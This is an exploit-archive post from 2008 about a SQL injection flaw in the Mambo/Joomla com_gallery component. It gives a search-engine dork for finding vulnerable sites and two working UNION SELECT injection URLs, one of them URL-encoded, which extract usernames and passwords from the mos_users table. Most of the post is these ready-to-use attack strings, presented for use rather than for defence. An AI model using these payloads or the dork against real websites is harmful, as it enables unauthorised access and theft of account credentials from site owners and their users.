Mambo Component com_gallery Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo Component com_gallery Remote SQL Injection Vulnerability
# Published : 2008-02-08
# Author : S@BUN
# Previous Title : Joomla Component NeoGallery 1.1 SQL Injection Vulnerability
# Next Title : osCommerce Addon Customer Testimonials 3.1 SQL Injection Vulnerability

#########################################################################
#
# joomla SQL Injection(com_gallery)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
#########################################################################
#
# DORK 1 : allinurl: com_gallery "func"
#
##########################################################################
EXPLOIT 1 :

index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*


EXPLO?°T 2 :

index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users

##########################################################################
# S@BUN                     www.hackturkiye.com                  S@BUN
##########################################################################
# S@BUN                        i AM NOT HACKER                     S@BUN
##########################################################################

# www.Syue.com [2008-02-08]